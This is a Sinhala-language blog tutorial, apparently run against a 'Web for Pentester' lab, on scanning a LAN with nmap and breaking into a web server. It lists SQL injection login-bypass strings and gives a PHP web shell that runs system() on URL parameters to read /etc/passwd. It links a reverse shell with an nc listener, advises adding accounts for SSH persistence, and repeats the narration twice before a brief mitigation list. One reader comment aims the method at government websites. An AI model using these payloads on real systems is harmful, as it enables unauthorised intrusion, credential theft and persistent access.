ඔව් ඉතින් පින්වතුනි අද කියන්න හදන්නේ කවුරුත් දන්නා nmap වලින් කොහොමද lan එක scan කරලා ඒකෙ සර්වර් එකකට ඇතුල් වෙන විදිහ
සෙටප් එක ගැන කිව්වෝත් මේකේ කාලි මැෂින් එකයි web for penterster කියල සර්වර් එකකුයි තියෙන්නේ
හරි මුලින්ම මන් ගන්නේ මේකට කාලි ලිනක්ස් එකක්
එකේ terminal එක open කරලා nmap කියල ගහල enter කරන්න
එතකොට මේ වගේ හැඳින්වීමක් දෙයි ඔයාලට
දැන් ip addr කියන කමාන්ඩ් එක ගහල අපේ ලෝකල් ip එක බලමු
හරි මේ තියෙන්නේ මගේ ලෝකල් ip එක
දැන් අපි බලමු කොහොමද lan එක scan කරන්නේ කියලා
ඕක ගහල enter කරන්න
දැන් scan වෙයි
දැන් මෙහෙම එයි
හරි ඔය උඩ තියෙන්නේ අපි scan කරපු එකේ report එක මොනාද on එකේ සහ මොනාද නැත්තේ කියල
දැන් බලමු මොනාද banner එලියට දෙන්නේ කියලා
ඒ කියන්නේ ඔය service එකක් එහෙම රන් වෙනවා නම් එකේ header එක එහෙම පෙන්නන්නේ ඒවා අල්ලන එක තමා මේ
මේ එකේ output එක
මේ තියෙන්නේ ip range එකක තියන පොර්ට් 65536 ම scan කරන කමාන්ඩ් එක
මේක තමා වටින්නේ
මේ තියෙන්නේ එක රන් කළාම
හරි මන් දැක්ක දැන් මේකේ ssh පොර්ට් එක open එකේ තියනවා ඉතින් මන් බලනවා මොඅක්ද මේ සර්වර් එක කියලා
ඔන්න මේකේ බැනර් එකක් තියනව
මන් දන්නවා මේක දැන් මොකක් හරි වටිනා සර්වර් එකක් කියලා හැබැයි මන් මේකේ username වත් පාස්වර්ඩ් වත් දන්නේ නෑ
දැන් මන් කරන්න හදන්නේ මේකේ os එක මොකක්ද කියල බලන්න
ඔන්න දැන් පේනවා මේකේ විස්තර ටිකක් මොකක්ද os එක සර්විස් මොනාද mac එක මොකක්ද වගේ දේවල් ටිකක්
දැන් බලන්නේ මේකේ http නොහොත් web සර්විස් මොනාද එලියට දීලා තියෙන්නේ කියලා සහ web සර්විස් වල තියන අඩුපාඩු මොනාද කියලා
මේ තියෙන්නේ තියන සර්විස් සහ ඒවගේ අඩුපාඩු
හරිනේ වැඩේ ආතල් වගේ
දැන් මන් බලනවා මොනාද මේකේ තියන සර්විස් වල version ටික කියල
ඔය දෙකම පාවිච්චි කරන්න පුළුවන්
ඔයාලට පේනවා ඇති මේ සර්විස් වල version එක බලාගන්න පුළුවන්
මේකේ තියන වටිනාකම තමා මේවගේ පරණ version වල එක එක අවුල් ආව අපිට තියෙන්නේ ඒවා හොයාගෙන ගේම දෙන්න
හරිනේ දැන් මන් browser එක open කරලා මේකේ ip එක ගහනවා web එක ලෝඩ් කරන්න
දැන් පලවෙනි ලින්ක් එකට ගිහින් බලනව මොනාද කරන්න පුළුවන් කියල
හරි දැන් පොඩි sql injection එකක් දීල බලමු
එකක් දෙකක් ගහල බලන්න වැඩ කරයි
හරි දැන් මන් php එකක් අප්ලෝඩ් කරලා සර්වර් එකේ /etc/passwd ෆයිල් එක read කරන්න හදන්නේ
වැඩේට php ෆයිල් එකක් හදාගන්න මේ කෝඩ් එක දාල
ඊටපස්සේ url එකේ මේක ගහන්න
දැන් බලමු shell එකක් php වලින් open කරගන්න විදිහ
මේක ගන්න php file එකකට
මේක අරන් මේකේ php-reverse-shell.php එක එඩිට් කරගන්න තමන්ගේ ip සහ පොර්ට් දාල
දැන් මේ වගේ file අප්ලෝඩ් කරන්න තියන තැනකට ගිහින් අප්ලෝඩ් කරන්න
දැන් කාලි එකේ
කියල ගහල listener එකක් දාගන්න
දැන් අරක අප්ලෝඩ් කරලා රන් කරන්න
වැඩේ හරි නම් මේ වගේ shell එකක් open වෙයි ඔයාගේ machine එකේ
මේ තියෙන්නේ සර්වර් එකේ shell එක
දැන් ඔයාට permission තියනවා නම් කෙලින්ම පුළුවන් user කෙනෙක් add කරලා පාස්වර්ඩ් එකක් දාල එකෙන් ssh වලින් ලොග් වෙන්න නැත්තම් තියන ලොගින් එකක පාස්වර්ඩ් වෙනස් කරලා ssh වලින් ලොග් වෙලා ඕනි දෙයක් කරන්න
Vulnerability අවුල් තැන්
Recommendations to fix weaknesses
❖ SQL injection
• Using of Prepared Statements
• Using Parameterized Queries
• Using of Stored Procedures
• White List Input Validation
• Escaping All User Supplied Input
• Enforcing Least Privilege
• Performing White List Input Validation as a Secondary Defense
❖ File Upload Vulnerability
• Use validated file extensions.
• Limiting upload facility registered users.
• Check the file from the internet for content. Make sure it is the file type we are accepting. • Use other file hosting site to accept files (google drive, MediaFire).
• Restricting users to file storing location.
• Add some random value to file when it storing.
❖ Reverse Shells
• Install good firewall.
සෙටප් එක ගැන කිව්වෝත් මේකේ කාලි මැෂින් එකයි web for penterster කියල සර්වර් එකකුයි තියෙන්නේ
හරි මුලින්ම මන් ගන්නේ මේකට කාලි ලිනක්ස් එකක්
එකේ terminal එක open කරලා nmap කියල ගහල enter කරන්න
nmap
එතකොට මේ වගේ හැඳින්වීමක් දෙයි ඔයාලට
දැන් ip addr කියන කමාන්ඩ් එක ගහල අපේ ලෝකල් ip එක බලමු
ip addr
හරි මේ තියෙන්නේ මගේ ලෝකල් ip එක
දැන් අපි බලමු කොහොමද lan එක scan කරන්නේ කියලා
nmap -v -sn 192.168.10.100-150
ඕක ගහල enter කරන්න
දැන් scan වෙයි
දැන් මෙහෙම එයි
හරි ඔය උඩ තියෙන්නේ අපි scan කරපු එකේ report එක මොනාද on එකේ සහ මොනාද නැත්තේ කියල
දැන් බලමු මොනාද banner එලියට දෙන්නේ කියලා
ඒ කියන්නේ ඔය service එකක් එහෙම රන් වෙනවා නම් එකේ header එක එහෙම පෙන්නන්නේ ඒවා අල්ලන එක තමා මේ
මේ එකේ output එක
මේ තියෙන්නේ ip range එකක තියන පොර්ට් 65536 ම scan කරන කමාන්ඩ් එක
මේක තමා වටින්නේ
nmap -p- 192.168.1.100-150
මේ තියෙන්නේ එක රන් කළාම
හරි මන් දැක්ක දැන් මේකේ ssh පොර්ට් එක open එකේ තියනවා ඉතින් මන් බලනවා මොඅක්ද මේ සර්වර් එක කියලා
ssh 192.168.10.104
ඔන්න මේකේ බැනර් එකක් තියනව
මන් දන්නවා මේක දැන් මොකක් හරි වටිනා සර්වර් එකක් කියලා හැබැයි මන් මේකේ username වත් පාස්වර්ඩ් වත් දන්නේ නෑ
දැන් මන් කරන්න හදන්නේ මේකේ os එක මොකක්ද කියල බලන්න
nmap -O 192.168.10.104
ඔන්න දැන් පේනවා මේකේ විස්තර ටිකක් මොකක්ද os එක සර්විස් මොනාද mac එක මොකක්ද වගේ දේවල් ටිකක්
දැන් බලන්නේ මේකේ http නොහොත් web සර්විස් මොනාද එලියට දීලා තියෙන්නේ කියලා සහ web සර්විස් වල තියන අඩුපාඩු මොනාද කියලා
nmap --script=http-enum 192.168.10.104
මේ තියෙන්නේ තියන සර්විස් සහ ඒවගේ අඩුපාඩු
හරිනේ වැඩේ ආතල් වගේ
දැන් මන් බලනවා මොනාද මේකේ තියන සර්විස් වල version ටික කියල
nmap -sV --version-all 192.168.10.104nmap -sV --version-intensity 5 192.168.10.104
ඔයාලට පේනවා ඇති මේ සර්විස් වල version එක බලාගන්න පුළුවන්
මේකේ තියන වටිනාකම තමා මේවගේ පරණ version වල එක එක අවුල් ආව අපිට තියෙන්නේ ඒවා හොයාගෙන ගේම දෙන්න
හරිනේ දැන් මන් browser එක open කරලා මේකේ ip එක ගහනවා web එක ලෝඩ් කරන්න
දැන් පලවෙනි ලින්ක් එකට ගිහින් බලනව මොනාද කරන්න පුළුවන් කියල
හරි දැන් පොඩි sql injection එකක් දීල බලමු
- admin' --
- admin' #
- admin'/*
- ' or 1=1--
- ' or 1=1#
- ' or 1=1/*
- ') or '1'='1--
- ') or ('1'='1--
හරි දැන් මන් php එකක් අප්ලෝඩ් කරලා සර්වර් එකේ /etc/passwd ෆයිල් එක read කරන්න හදන්නේ
වැඩේට php ෆයිල් එකක් හදාගන්න මේ කෝඩ් එක දාල
<?php echo system ($_GET ["val1"].' '.$_GET ["val2"] ); ?>දැන් එක අප්ලෝඩ් කරලා click කරන්න තියෙන්නේ
ඊටපස්සේ url එකේ මේක ගහන්න
http://192.168.10.104/upload/images/simple.php?val1=cat&val2=/etc/passwd
වැඩේ පොඩ්ඩක් ගලපලා ගහන්න
හරි නම් සර්වර් එකේ පාස්වර්ඩ් file එක පෙන්නයි
දැන් බලමු shell එකක් php වලින් open කරගන්න විදිහ
මේක ගන්න php file එකකට
මේක අරන් මේකේ php-reverse-shell.php එක එඩිට් කරගන්න තමන්ගේ ip සහ පොර්ට් දාල
http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
දැන් ඔකේ අදාළ තැන් වලට ip පොර්ට් එහෙම දීලා save කරලා ඉන්න
දැන් මේ වගේ file අප්ලෝඩ් කරන්න තියන තැනකට ගිහින් අප්ලෝඩ් කරන්න
දැන් කාලි එකේ
nc -nvlp 1234
කියල ගහල listener එකක් දාගන්න
දැන් අරක අප්ලෝඩ් කරලා රන් කරන්න
වැඩේ හරි නම් මේ වගේ shell එකක් open වෙයි ඔයාගේ machine එකේ
මේ තියෙන්නේ සර්වර් එකේ shell එක
දැන් ඔයාට permission තියනවා නම් කෙලින්ම පුළුවන් user කෙනෙක් add කරලා පාස්වර්ඩ් එකක් දාල එකෙන් ssh වලින් ලොග් වෙන්න නැත්තම් තියන ලොගින් එකක පාස්වර්ඩ් වෙනස් කරලා ssh වලින් ලොග් වෙලා ඕනි දෙයක් කරන්න
Vulnerability අවුල් තැන්
Recommendations to fix weaknesses
❖ SQL injection
• Using of Prepared Statements
• Using Parameterized Queries
• Using of Stored Procedures
• White List Input Validation
• Escaping All User Supplied Input
• Enforcing Least Privilege
• Performing White List Input Validation as a Secondary Defense
❖ File Upload Vulnerability
• Use validated file extensions.
• Limiting upload facility registered users.
• Check the file from the internet for content. Make sure it is the file type we are accepting. • Use other file hosting site to accept files (google drive, MediaFire).
• Restricting users to file storing location.
• Add some random value to file when it storing.
❖ Reverse Shells
• Install good firewall.
කියන්න සතුටුයි පිංවතුනි ගවර්මන්ට් වෙබ් සයිට් වලට බුදු සරණයි දෙවි පිහිටයි
ReplyDeleteEla machan
ReplyDeleteelama ithin
ReplyDelete